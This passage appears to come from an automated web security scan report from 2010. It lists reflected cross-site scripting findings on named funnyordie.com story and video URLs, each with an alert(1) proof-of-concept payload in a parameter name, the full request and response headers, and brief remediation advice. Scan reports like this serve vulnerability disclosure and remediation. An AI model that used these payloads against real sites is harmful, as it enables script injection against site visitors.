The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7bbc"-alert(1)-"4f7352de02f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/8d571e73b1/snoop-dogg-vs-robocop-kid-the-two-best-halloween-costumes?b7bbc"-alert(1)-"4f7352de02f=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "12871a457d76d66d6b73525b4ff58e78" X-Runtime: 497 X-Varnish: 1401140363 X-Varnish: 573922795 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:26:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:26:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 266244
1.87. http://www.funnyordie.com/stories/8d571e73b1/snoop-dogg-vs-robocop-kid-the-two-best-halloween-costumes [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10957"><script>alert(1)</script>0316b6a6bef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /stories/8d571e73b1/snoop-dogg-vs-robocop-kid-the-two-best-halloween-costumes?10957"><script>alert(1)</script>0316b6a6bef=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "afe07e1f8201d9b575736c372ab931fa" X-Runtime: 202 X-Varnish: 1401138955 X-Varnish: 1264375251 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:25:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:25:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 266297
1.88. http://www.funnyordie.com/stories/bda084f6e5/zach-galifianakis-smokes-joint-on-bill-maher [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1bc8"-alert(1)-"7edd7e68d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/bda084f6e5/zach-galifianakis-smokes-joint-on-bill-maher?a1bc8"-alert(1)-"7edd7e68d45=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "18c5b12c257da2b7e576b2f69ce86b90" X-Runtime: 499 X-Varnish: 1401142378 X-Varnish: 1264379140 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:28:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:28:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 272978
1.89. http://www.funnyordie.com/stories/bda084f6e5/zach-galifianakis-smokes-joint-on-bill-maher [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68ccd"><script>alert(1)</script>2a47d3f9b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /stories/bda084f6e5/zach-galifianakis-smokes-joint-on-bill-maher?68ccd"><script>alert(1)</script>2a47d3f9b7=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "a76a04f67e4c6f3652c208bd7ea03b6e" X-Runtime: 188 X-Varnish: 1401140745 X-Varnish: 573923277 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:27:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:27:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 273040
1.90. http://www.funnyordie.com/stories/c775a8268a/if-the-internet-decided-the-elections [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c6d6"-alert(1)-"ff36c4490f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/c775a8268a/if-the-internet-decided-the-elections?4c6d6"-alert(1)-"ff36c4490f8=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "488bb9c33d05b11f336010b50d70d03a" X-Runtime: 433 X-Varnish: 1401136791 X-Varnish: 573918196 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:22:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:22:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 273696
1.91. http://www.funnyordie.com/stories/c775a8268a/if-the-internet-decided-the-elections [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d90"><script>alert(1)</script>481519aab98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /stories/c775a8268a/if-the-internet-decided-the-elections?a9d90"><script>alert(1)</script>481519aab98=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "2fcdaf9ddeb7ce1b59c412c86a67f9b5" X-Runtime: 151 X-Varnish: 1401135236 X-Varnish: 573916423 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:21:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:21:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 273795
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57334"-alert(1)-"c804af3d5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videos/0d646e2edb/lindsay-lohan-s-eharmony-profile?57334"-alert(1)-"c804af3d5a=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "81ed16081ecee3e714d9859939a9b9f7" X-Runtime: 257 X-Varnish: 1401112354 X-Varnish: 573887724 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 04:57:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:57:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 289753
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3244"><script>alert(1)</script>c7149784f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videos/0d646e2edb/lindsay-lohan-s-eharmony-profile?c3244"><script>alert(1)</script>c7149784f3=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "5641e4b547e807384bf3525213b1b731" X-Runtime: 239 X-Varnish: 1401111645 X-Varnish: 573886700 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 04:56:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:56:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 289845
1.94. http://www.funnyordie.com/videos/2641/sarah-silverman-teaching-girls-comedy-from-mysteryuploader-and-sarah-silverman [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24a5d"><script>alert(1)</script>4cff7c8ab88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videos/2641/sarah-silverman-teaching-girls-comedy-from-mysteryuploader-and-sarah-silverman?24a5d"><script>alert(1)</script>4cff7c8ab88=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "04ff36e40176e0aa4f532953fffa7d59" X-Runtime: 490 X-Varnish: 1401112117 X-Varnish: 573887342 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 04:57:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:57:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 277661
1.95. http://www.funnyordie.com/videos/2641/sarah-silverman-teaching-girls-comedy-from-mysteryuploader-and-sarah-silverman [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e625"-alert(1)-"8d1536164c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videos/2641/sarah-silverman-teaching-girls-comedy-from-mysteryuploader-and-sarah-silverman?3e625"-alert(1)-"8d1536164c7=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "d6ca770898abf2eb0ce4a8ed16f8f815" X-Runtime: 223 X-Varnish: 1401112663 X-Varnish: 573888230 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 04:57:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:57:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 277567
1.96. http://www.funnyordie.com/videos/60072add5a/between-two-ferns-with-zach-galifianakis-ben-stiller [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cb16"-alert(1)-"42d190ba6dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videos/60072add5a/between-two-ferns-with-zach-galifianakis-ben-stiller?1cb16"-alert(1)-"42d190ba6dc=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "5479fcfafbbeb47603c53425573ac5b3" X-Runtime: 589 X-Varnish: 1401112441 X-Varnish: 573887868 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 04:57:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:57:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 298068
1.97. http://www.funnyordie.com/videos/60072add5a/between-two-ferns-with-zach-galifianakis-ben-stiller [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d949a"><script>alert(1)</script>42731c43eff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videos/60072add5a/between-two-ferns-with-zach-galifianakis-ben-stiller?d949a"><script>alert(1)</script>42731c43eff=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "823765fad74159e9acddad15854484bb" X-Runtime: 601 X-Varnish: 1401111853 X-Varnish: 1264342482 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 04:57:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:57:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 298112
1.98. http://www.funnyordie.com/videos/b88bd1c48f/the-tutors-of-826-la-from-judd-apatow-michael-cera-bill-hader-will-forte-and-craig-robinson [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 131aa"-alert(1)-"033190fb8d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videos/b88bd1c48f/the-tutors-of-826-la-from-judd-apatow-michael-cera-bill-hader-will-forte-and-craig-robinson?131aa"-alert(1)-"033190fb8d0=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "558db5a60ca4343640fabad9e49aa8e7" X-Runtime: 239 X-Varnish: 1401111264 X-Varnish: 1264341790 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 04:56:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:56:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 282518
1.99. http://www.funnyordie.com/videos/b88bd1c48f/the-tutors-of-826-la-from-judd-apatow-michael-cera-bill-hader-will-forte-and-craig-robinson [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cbbb"><script>alert(1)</script>057282d756c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videos/b88bd1c48f/the-tutors-of-826-la-from-judd-apatow-michael-cera-bill-hader-will-forte-and-craig-robinson?4cbbb"><script>alert(1)</script>057282d756c=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "20cecd4bafeb9c60c4ff711ae5e6026b" X-Runtime: 220 X-Varnish: 1401110986 X-Varnish: 1264341383 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 04:56:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:56:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 282614
1.100. http://www.funnyordie.com/videos/c8863726da/judd-apatow-psa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/videos/c8863726da/judd-apatow-psa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b04ba"><script>alert(1)</script>7483be9e117 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videos/c8863726da/judd-apatow-psa?b04ba"><script>alert(1)</script>7483be9e117=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "4ce3ab5024f1bef89e87010b81ee2f2b" X-Runtime: 658 X-Varnish: 1401058457 X-Varnish: 573812781 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 04:01:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:01:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 297743
1.101. http://www.funnyordie.com/videos/c8863726da/judd-apatow-psa [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/videos/c8863726da/judd-apatow-psa
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1c6e"-alert(1)-"a128f0045a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videos/c8863726da/judd-apatow-psa?d1c6e"-alert(1)-"a128f0045a7=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "d6e73bd9c98c6652b30d9d377d927f78" X-Runtime: 878 X-Varnish: 1401058524 X-Varnish: 573812846 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 04:01:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:01:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 297720